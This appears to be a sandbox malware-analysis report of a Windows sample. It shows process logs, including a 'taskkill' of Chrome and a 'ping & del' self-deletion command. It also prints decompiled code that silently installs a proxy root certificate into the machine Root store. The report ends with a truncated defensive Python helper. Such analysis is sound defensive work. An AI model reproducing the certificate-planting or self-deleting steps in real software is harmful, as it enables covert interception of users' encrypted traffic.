MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:31:23
Start date: 30/01/2021
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 3
Imagebase: 0xd00000
File size: 18944 bytes
MD5 hash: 70C24A306F768936563ABDADB9CA9108
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 14:31:30
Start date: 30/01/2021
Path: C:\Users\user\AppData\Roaming\1612045890161.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt'
Imagebase: 0x400000
File size: 103632 bytes
MD5 hash: EF6F72358CB02551CAEBE720FBC55F95
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 3%, Metadefender
• Detection: 14%, ReversingLabs
Reputation: moderate

General

Start time: 14:31:31
Start date: 30/01/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /c taskkill /f /im chrome.exe
Imagebase: 0x910000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:31:32
Start date: 30/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:31:32
Start date: 30/01/2021
Path: C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit): true
Commandline: taskkill /f /im chrome.exe
Imagebase: 0xef0000
File size: 74752 bytes
MD5 hash: 15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 14:31:37
Start date: 30/01/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Imagebase: 0x240000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:31:37
Start date: 30/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:38
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                        File size:18944 bytes
                                                                                                                                                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:11
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                                        Imagebase:0x2b0000
                                                                                                                                                                        File size:73160 bytes
                                                                                                                                                                        MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 3%, Metadefender, Browse
                                                                                                                                                                        • Detection: 2%, ReversingLabs

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:20
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:20
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:20
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                        File size:18944 bytes
                                                                                                                                                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

Disassembly

Code Analysis


Executed Functions

C-Code - Quality: 88%
E100204C0(void* __ebx, void* __edi, void* __eflags) {
	int _v8;
	intOrPtr _v16;
	char _v44;
	char _v311;
	char _v312;
	char _v575;
	char _v576;
	long _v580;
	intOrPtr _v584;
	intOrPtr _v588;
	intOrPtr _v592;
	intOrPtr _v596;
	intOrPtr _v600;
	intOrPtr _v604;
	intOrPtr _v608;
	intOrPtr _v612;
	intOrPtr _v616;
	intOrPtr _v620;
	intOrPtr _v624;
	intOrPtr _v628;
	void* __esi;
	void* _t46;
	int _t47;
	void* _t56;
	void* _t57;
	int _t62;
	intOrPtr _t73;
	int _t75;
	int _t77;
	void* _t101;
	intOrPtr _t104;
	void* _t108;
	void* _t109;
	void* _t111;
	intOrPtr _t114;
	void* _t115;
	intOrPtr _t116;
	intOrPtr _t118;
	intOrPtr _t120;
	void* _t125;

	_t125 = __eflags;
	_t100 = __edi;
	_t82 = __ebx;
	_push(0xffffffff);
	_push(E10022D01);
	_push( *[fs:0x0]);
	 *[fs:0x0] = _t104;
	_push(_t101);
	E1001FD60();
	_v312 = 0;
	E1000CF20(__edi,  &_v311, 0, 0x103);
	GetModuleFileNameA(0,  &_v312, 0x104);
	E1001A600(__ebx, _t100, _t101, _t125,  &_v44); // executed
	_v8 = 0;
	_t46 = E10001A50( &_v312, E100011E0( &_v44));
	_t108 = _t104 - 0x264 + 0x18;
	_t126 = _t46;
	if(_t46 == 0) {
		_t47 = E1001A0F0("Global\\exist_sign__install_r3"); // executed
		_t109 = _t108 + 4;
		__eflags = _t47;
		if(_t47 == 0) {
			_v576 = 0;
			E1000CF20(_t100,  &_v575, 0, 0x103);
			GetTempPathA(0x104,  &_v576);
			E1000CD96( &_v576,  &_v576, 0x104, E100011E0( &_v44));
			_t111 = _t109 + 0x18;
			CopyFileA( &_v312,  &_v576, 0); // executed
			_v580 = GetTickCount();
			while(1) {
				_t56 = E1001A170( &_v312); // executed
				_t102 = _t56;
				_t57 = E1001A170( &_v576); // executed
				_t111 = _t111 + 8;
				__eflags = _t56 - _t57;
				if(__eflags == 0) {
					break;
				}
				Sleep(0x3e8);
				__eflags = GetTickCount() - _v580 - 0x7530;
				if(__eflags <= 0) {
					continue;
				} else {
				}
				break;
			}
			E1001FDB0(); // executed
			E1001FF90(_t82, _t100, _t102, __eflags, "install", "installp2", "-0.3", "45.0.0", "exe"); // executed
			_t114 = _t111 + 0x14 - 0x1c;
			_t89 = _t114;
			_v588 = _t114;
			_v612 = E10001160(_t114, __eflags, "status=main_start");
			E10020180(_t82, _t100, _t102, __eflags); // executed
			_t115 = _t114 + 0x1c;
			_t62 = PathFileExistsA("C:\\hijack"); // executed
			__eflags = _t62;
                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                          							L15:
                                                                                                                                                                          							_t116 = _t115 - 0x1c;
                                                                                                                                                                          							_v592 = _t116;
                                                                                                                                                                          							_v616 = E10001160(_t116, __eflags, "status=check_debug");
                                                                                                                                                                          							E10020180(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                                          							_t118 = _t116 + 0x1c - 0x1c;
                                                                                                                                                                          							_v596 = _t118;
                                                                                                                                                                          							_v620 = E10001160(_t118, __eflags, "installp2");
                                                                                                                                                                          							E1001FEA0(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                                          							_t120 = _t118 + 0x1c - 0x1c;
                                                                                                                                                                          							_v600 = _t120;
                                                                                                                                                                          							_v624 = E10001160(_t120, __eflags, "installp2");
                                                                                                                                                                          							E1001FDC0(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                                          							_v604 = _t120 + 0x1c - 0x1c;
                                                                                                                                                                          							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
                                                                                                                                                                          							E10020180(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                                          						} else {
                                                                                                                                                                          							E1001A0A0(); // executed
                                                                                                                                                                          							_t75 = E1001A0B0(_t89); // executed
                                                                                                                                                                          							__eflags = _t75;
                                                                                                                                                                          							if(_t75 == 0) {
                                                                                                                                                                          								L12:
                                                                                                                                                                          							} else {
                                                                                                                                                                          								__eflags = E10019D10();
                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                          									_t77 = E1001FA30(_t82, _t100, _t102, __eflags, 0x3e8, 0); // executed
                                                                                                                                                                          									_t115 = _t115 + 8;
                                                                                                                                                                          									__eflags = _t77;
                                                                                                                                                                          									if(__eflags != 0) {
                                                                                                                                                                          										goto L15;
                                                                                                                                                                          									} else {
                                                                                                                                                                          									}
                                                                                                                                                                          								} else {
                                                                                                                                                                          									goto L12;
                                                                                                                                                                          								}
                                                                                                                                                                          							}
                                                                                                                                                                          						}
                                                                                                                                                                          					} else {
                                                                                                                                                                          					}
                                                                                                                                                                          					E1001A260(); // executed
                                                                                                                                                                          					_v608 = 1;
                                                                                                                                                                          					_v8 = 0xffffffff;
                                                                                                                                                                          					E100011A0( &_v44);
                                                                                                                                                                          					_t73 = _v608;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					E10020A80(__ebx, _t100, _t101, _t126, "45.0.0");
                                                                                                                                                                          					_v584 = 1;
                                                                                                                                                                          					_v8 = 0xffffffff;
                                                                                                                                                                          					E100011A0( &_v44);
                                                                                                                                                                          					_t73 = _v584;
                                                                                                                                                                          				}
                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                          				return _t73;
                                                                                                                                                                          			}

[Per-line instruction addresses for the decompiled function above. In the report each address sits beside the decompiled line it belongs to; extraction detached the column, so only the range is kept here: the column starts at 0x100204c0 and ends at 0x1002078e, with 0x00000000 marking lines that map to no instruction (braces and labels).]

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 100204F9
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002050F
                                                                                                                                                                            • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                                            • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                                            • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                                          • String ID: -0.3$45.0.0$45.0.0$C:\hijack$Global\exist_sign__install_r3$exe$install$installp2$installp2$installp2$status=check_debug$status=main_over$status=main_start
                                                                                                                                                                          • API String ID: 3079340674-624698304
                                                                                                                                                                          • Opcode ID: 8ae39e83437ea26eceefe112d98eb2762d5fc529021f9d4b598543daa85cb8fb
                                                                                                                                                                          • Instruction ID: c22925573318c8528c32417883aa4fd6f710712ddf5f47052043116b831c363f
                                                                                                                                                                          • Opcode Fuzzy Hash: 8ae39e83437ea26eceefe112d98eb2762d5fc529021f9d4b598543daa85cb8fb
                                                                                                                                                                          • Instruction Fuzzy Hash: 0951B2B5D04318ABEB20EBA4DC4BBDE7775DB10344F400194F90966182EB31BB84CFA2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 52%
                                                                                                                                                                          			E1001F720(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                          				int _v8;
                                                                                                                                                                          				int _v12;
                                                                                                                                                                          				char* _v16;
                                                                                                                                                                          				BYTE* _v20;
                                                                                                                                                                          				int _v24;
                                                                                                                                                                          				int _v28;
                                                                                                                                                                          				int _v32;
                                                                                                                                                                          				int _v36;
                                                                                                                                                                          				char _v299;
                                                                                                                                                                          				char _v300;
                                                                                                                                                                          				char _v563;
                                                                                                                                                                          				char _v564;
                                                                                                                                                                          				signed int _v568;
                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                          				BYTE* _t66;
                                                                                                                                                                          				int _t69;
                                                                                                                                                                          				int _t70;
                                                                                                                                                                          				int _t71;
                                                                                                                                                                          				long _t72;
                                                                                                                                                                          				int _t75;
                                                                                                                                                                          				signed int _t90;
                                                                                                                                                                          				void* _t120;
                                                                                                                                                                          				void* _t121;
                                                                                                                                                                          				void* _t122;
                                                                                                                                                                          				void* _t123;
                                                                                                                                                                          				void* _t124;
                                                                                                                                                                          				void* _t127;
                                                                                                                                                                          
                                                                                                                                                                          				_t119 = __esi;
                                                                                                                                                                          				_t118 = __edi;
                                                                                                                                                                          				_t91 = __ebx;
                                                                                                                                                                          				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                          				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
                                                                                                                                                                          					_t66 = L1000CE56(__ebx, _v12, __edi, __esi, _v12);
                                                                                                                                                                          					_t122 = _t121 + 4;
                                                                                                                                                                          					_v20 = _t66;
                                                                                                                                                                          					_t133 = _v20;
                                                                                                                                                                          					if(_v20 != 0) {
                                                                                                                                                                          						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
                                                                                                                                                                          						_t69 = _v12;
                                                                                                                                                                          						__imp__CertCreateCertificateContext(1, _v20, _t69); // executed
                                                                                                                                                                          						_v8 = _t69;
                                                                                                                                                                          						_push(_v20);
                                                                                                                                                                          						_t70 = E1000CA30(__ebx, __edi, __esi, _t133);
                                                                                                                                                                          						_t123 = _t122 + 4;
                                                                                                                                                                          						if(_v8 != 0) {
                                                                                                                                                                          							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root"); // executed
                                                                                                                                                                          							_v28 = _t70;
                                                                                                                                                                          							if(_v28 != 0) {
                                                                                                                                                                          								_t71 = _v8;
                                                                                                                                                                          								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0); // executed
                                                                                                                                                                          								if(_t71 == 0) {
                                                                                                                                                                          									_t72 = GetLastError();
                                                                                                                                                                          									__eflags = _t72 - 0x80092005;
                                                                                                                                                                          									if(_t72 == 0x80092005) {
                                                                                                                                                                          										_v36 = 0;
                                                                                                                                                                          										_v32 = 0;
                                                                                                                                                                          										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
                                                                                                                                                                          										__eflags = _v36;
                                                                                                                                                                          										if(_v36 > 0) {
                                                                                                                                                                          											_t75 = L1000CE56(__ebx,  &_v36, __edi, __esi, _v36 + 1);
                                                                                                                                                                          											_t124 = _t123 + 4;
                                                                                                                                                                          											_v32 = _t75;
                                                                                                                                                                          											__eflags = _v32;
                                                                                                                                                                          											if(_v32 != 0) {
                                                                                                                                                                          												E1000CF20(_t118, _v32, 0, _v36 + 1);
                                                                                                                                                                          												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
                                                                                                                                                                          												_v564 = 0;
                                                                                                                                                                          												E1000CF20(_t118,  &_v563, 0, 0x103);
                                                                                                                                                                          												_v300 = 0;
                                                                                                                                                                          												E1000CF20(_t118,  &_v299, 0, 0x103);
                                                                                                                                                                          												_t127 = _t124 + 0x24;
                                                                                                                                                                          												_v568 = 0;
                                                                                                                                                                          												while(1) {
                                                                                                                                                                          													__eflags = _v568 - _v36;
                                                                                                                                                                          													if(_v568 >= _v36) {
                                                                                                                                                                          														break;
                                                                                                                                                                          													}
                                                                                                                                                                          													E1000CC93(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
                                                                                                                                                                          													_t127 = _t127 + 0xc;
                                                                                                                                                                          													_t90 = _v568 + 1;
                                                                                                                                                                          													__eflags = _t90;
                                                                                                                                                                          													_v568 = _t90;
                                                                                                                                                                          												}
                                                                                                                                                                          												E1000CC93(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
                                                                                                                                                                          												_v24 = E1001F680(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
                                                                                                                                                                          												_push(_v32);
                                                                                                                                                                          												E1000CA30(_t91, _t118, _t119, __eflags);
                                                                                                                                                                          											}
                                                                                                                                                                          										}
                                                                                                                                                                          									}
                                                                                                                                                                          								} else {
                                                                                                                                                                          									_v24 = 1;
                                                                                                                                                                          								}
                                                                                                                                                                          								__imp__CertCloseStore(_v28, 1);
                                                                                                                                                                          							}
                                                                                                                                                                          							__imp__CertFreeCertificateContext(_v8);
                                                                                                                                                                          						}
                                                                                                                                                                          					}
                                                                                                                                                                          				}
                                                                                                                                                                          				return _v24;
                                                                                                                                                                          			}

                                                                                                                                                                           Control-flow graph of the function at 0x1001F720 (basic blocks 0x1001F720 through 0x1001F988): only the block addresses survived extraction; the graph image and the instruction text are not present on this page.

                                                                                                                                                                          APIs
                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                                          • CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                            • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                            • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                                          • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                                          • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 1001F817
                                                                                                                                                                          • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F842
                                                                                                                                                                          • _memset.LIBCMT ref: 1001F87B
                                                                                                                                                                          • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F891
                                                                                                                                                                          • _memset.LIBCMT ref: 1001F8AC
                                                                                                                                                                          • _memset.LIBCMT ref: 1001F8C9
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001F91C
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001F939
                                                                                                                                                                          • CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                                          • CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                           • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
                                                                                                                                                                          • String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
                                                                                                                                                                          • API String ID: 3311258246-1857994723
                                                                                                                                                                          • Opcode ID: 0ce81e6e7efad015fc66a7c972b9d95a9014d6efbbcb29acca2529cb5b9abefb
                                                                                                                                                                          • Instruction ID: afe3fe35dc8e16d3553f6fe7244bb1c21b11eefa07642306de8368dfec16bcca
                                                                                                                                                                          • Opcode Fuzzy Hash: 0ce81e6e7efad015fc66a7c972b9d95a9014d6efbbcb29acca2529cb5b9abefb
                                                                                                                                                                          • Instruction Fuzzy Hash: 986133B5D00219BBEB10DB90CC99FFEB778EB48704F104598F605BA280D775AA85CFA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%
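The API sequence above is the root-certificate installer behind the "Installs new ROOT certificates" signature: CryptStringToBinaryA decodes a PEM/base64 certificate embedded at 0x10025F28, CertOpenStore(0xA = CERT_STORE_PROV_SYSTEM_A, flags 0x24000 = CERT_SYSTEM_STORE_LOCAL_MACHINE | CERT_STORE_OPEN_EXISTING_FLAG, "Root") opens the machine-wide Root store, CertAddCertificateContextToStore writes the certificate into it, and CertGetCertificateContextProperty(3 = CERT_SHA1_HASH_PROP_ID) plus the "%02X" sprintf turn the thumbprint into the registry key name "Software\Microsoft\SystemCertificates\Root\Certificates\<THUMBPRINT>" (under HKLM for the LocalMachine store). The following is an added example written for this page, not code from the sample or from Joe Sandbox: it reproduces that bookkeeping in Python so a responder can derive the registry key a given certificate would land in and validate a suspicious entry found there. The layout of the per-certificate "Blob" registry value (a sequence of DWORD property id, DWORD reserved, DWORD length, data records, with property 0x20 holding the DER certificate and property 3 the SHA-1) is an assumption stated in the code, and the certificate bytes are constructed placeholder data, not a real X.509 certificate.

```python
"""
Added example (not code from the analysed sample or from Joe Sandbox).

Reproduces the bookkeeping of the function at 0x1001F720: decode a PEM
certificate, compute the thumbprint CryptoAPI stores as CERT_SHA1_HASH_PROP_ID,
and build the SystemCertificates\Root registry key name the sample formats.
Also parses a per-certificate "Blob" registry value so an entry found on a
host can be checked for consistency.

Assumptions (labelled): the "Blob" value is a sequence of property records
(DWORD propid, DWORD reserved == 1, DWORD length, data), property 0x20 holds
the DER certificate and property 3 the SHA-1 hash. SAMPLE_DER is constructed
placeholder data, not a real certificate.
"""
import base64
import hashlib
import re
import struct

CERT_SHA1_HASH_PROP_ID = 3      # property id the sample passes to CertGetCertificateContextProperty
CERT_CERT_PROP_ID = 0x20        # encoded certificate inside a "Blob" value (assumption, see docstring)
ROOT_KEY_FMT = r"Software\Microsoft\SystemCertificates\Root\Certificates\%s"   # format string from the sample

_PEM_RE = re.compile(r"-----BEGIN [^-]+-----(.*?)-----END [^-]+-----", re.S)

# Constructed placeholder "certificate" so the example runs offline.
SAMPLE_DER = b"\x30\x82\x01\x00" + b"constructed placeholder, not a real certificate"
SAMPLE_PEM = ("-----BEGIN CERTIFICATE-----\n"
              + base64.b64encode(SAMPLE_DER).decode()
              + "\n-----END CERTIFICATE-----\n")


def pem_to_der(pem: str) -> bytes:
    """What CryptStringToBinaryA does for a base64 string with header: strip the armour and decode."""
    m = _PEM_RE.search(pem)
    body = m.group(1) if m else pem
    return base64.b64decode("".join(body.split()))


def thumbprint(der: bytes) -> str:
    """CERT_SHA1_HASH_PROP_ID is SHA-1 over the encoded certificate; the sample prints it with "%02X"."""
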